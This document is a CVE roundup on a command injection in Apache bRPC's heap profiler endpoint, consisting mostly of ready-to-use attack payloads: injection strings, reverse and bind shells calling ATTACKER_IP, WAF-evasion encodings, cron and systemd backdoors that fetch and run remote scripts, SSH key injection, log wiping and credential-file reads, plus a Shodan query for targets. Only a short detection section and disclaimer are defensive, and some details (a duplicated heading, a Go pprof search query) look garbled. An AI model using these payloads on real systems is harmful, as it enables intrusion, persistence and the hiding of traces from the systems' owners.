Apache bRPC Command Injection

Apache bRPC Command Injection

# CVE-2025-60021 Roundup

## Vulnerability Summary
**CVE-2025-60021**: Apache bRPC Apache bRPC Command Injection

# CVE-2025-60021 Roundup

## Vulnerability Summary
**CVE-2025-60021**: Apache bRPC Heap Profiler Command Injection
- **Severity**: Critical (CVSS 9.8)
- **Affected**: Apache bRPC < 1.15.0
- **Endpoint**: `/pprof/heap`
- **Parameter**: `extra_options`
- **Impact**: Remote Code Execution
- **Author**: ninjazan420

## Attack Vectors

### Primary Vector
```
POST /pprof/heap HTTP/1.1
Host: target:9002 or target:9002
Shodan query: "go" "pprof"
Content-Type: application/x-www-form-urlencoded

extra_options=;id;whoami;pwd
```

### Secondary Vectors
1. **GET Request**: `GET /pprof/heap?extra_options=malicious_command`
2. **JSON API**: `{"extra_options": "malicious_command"}`
3. **File Upload**: Via multipart/form-data with extra_options parameter

## Payload Examples

### Basic Command Execution
```bash
# Linux Commands
extra_options=;id;whoami;uname;-a;pwd

# Windows Commands (if applicable)
extra_options=|whoami|dir|net user

# Network Reconnaissance
extra_options=;netstat -an;ss -tuln;cat /etc/passwd
```

### Reverse Shell
```bash
# Bash Reverse Shell
extra_options=;bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'

# Python Reverse Shell
extra_options=;python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Perl Reverse Shell
extra_options=;perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
```

### Bind Shell
```bash
# Bind Shell on Port 4444
extra_options=;nc -lvp 4444 -e /bin/bash

# Python Bind Shell
extra_options=;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",4444));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

## Bypass Techniques

### WAF Evasion
```bash
# URL Encoding
extra_options=%3Bid%3Bwhoami

# Base64 Encoding
extra_options=$(echo "Y2F0IC9ldGMvcGFzc3dkCg==" | base64 -d)

# Hex Encoding
extra_options=\x3b\x69\x64\x3b\x77\x68\x6f\x61\x6d\x69

# Command Obfuscation
extra_options=;$0\ -c\ \"whoami\"
```

### Filter Bypass
```bash
# Space Replacement
extra_options=;id;whoami;pwd

# Special Characters
extra_options=|id|whoami|pwd

# Multiple Commands
extra_options=&&id&&whoami&&pwd

# Command Substitution
extra_options=`id`|whoami|pwd
```

## Persistence Methods

### Cron Jobs
```bash
# Add Cron Job
extra_options=;echo '* * * * * /bin/bash -c "curl http://ATTACKER_IP/payload.sh | bash"' >> /var/spool/cron/crontabs/root

# Systemd Service
extra_options=;echo '[Unit]\nDescription=Backdoor\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=/bin/bash -c "while true; do curl http://ATTACKER_IP/payload.sh | bash; sleep 300; done"\nRestart=always\n\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/backdoor.service
```

### SSH Key Injection
```bash
# Add SSH Key
extra_options=;mkdir -p /root/.ssh;echo "SSH_PUBLIC_KEY" >> /root/.ssh/authorized_keys;chmod 600 /root/.ssh/authorized_keys
```

## Detection Evasion

### Log Cleaning
```bash
# Clear Logs
extra_options=;echo > /var/log/auth.log;echo > /var/log/syslog;echo > /var/log/wtmp;echo > /var/log/lastlog

# Hide Processes
extra_options=;chmod +x /tmp/.hidden;nohup /tmp/.hidden >/dev/null 2>&1 &
```

### Network Stealth
```bash
# Encrypted Communication
extra_options=;openssl s_client -connect ATTACKER_IP:443 -quiet | /bin/bash

# DNS Tunneling
extra_options=;dig +short @ATTACKER_DOMAIN TXT "command"
```

## Post-Exploitation Commands

### System Information
```bash
# Basic Info
extra_options=;uname -a;id;whoami;pwd

# Network Info
extra_options=;ifconfig;ip addr;netstat -an;ss -tuln

# Process Info
extra_options=;ps aux;top;htop

# File System
extra_options=;ls -la /;df -h;mount;cat /etc/passwd;cat /etc/shadow
```

### Privilege Escalation
```bash
# SUID Binaries
extra_options=;find / -type f -perm -4000 -ls

# Cron Jobs
extra_options=;cat /etc/cron*;crontab -l

# Environment Variables
extra_options=;env;printenv
```

## Detection Signatures

### Log Patterns
```
/pprof/heap.*extra_options=
POST.*pprof.*extra_options
Command injection in heap profiler
```

### Network Indicators
- Requests to `/pprof/heap` with `extra_options` parameter
- Unusual command execution patterns
- Reverse shell connections to external IPs

## Tools and Resources

### Recommended Tools
- **Nmap**: `nmap -sV -p 9002`
- **Burp Suite**: Web vulnerability testing
- **Metasploit**: Exploit framework
- **Cobalt Strike**: Advanced post-exploitation

### Wordlists
- Common bRPC endpoints
- Command injection payloads
- Parameter names for profiling services

## Legal and Ethical Considerations

### Authorized Testing Only
- **Written Permission**: Required before testing
- **Scope Definition**: Clear boundaries for testing
- **Notification**: Inform stakeholders of testing
- **Documentation**: Keep detailed records of testing

### Responsible Disclosure
- **Vendor Notification**: Report vulnerabilities to vendor
- **Patch Timeline**: Allow reasonable time for patching
- **Public Disclosure**: Only after patch is available
- **Coordination**: Work with security teams

---

**Note**: This document is for educational and authorized testing purposes only. Unauthorized access to computer systems is illegal and unethical.